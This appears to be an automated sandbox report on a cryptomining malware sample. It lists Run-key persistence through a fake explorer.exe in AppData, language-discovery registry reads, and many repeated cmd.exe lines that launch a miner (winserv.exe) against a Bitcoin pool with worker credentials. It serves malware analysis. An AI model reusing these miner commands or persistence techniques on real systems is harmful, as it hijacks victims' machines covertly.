| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
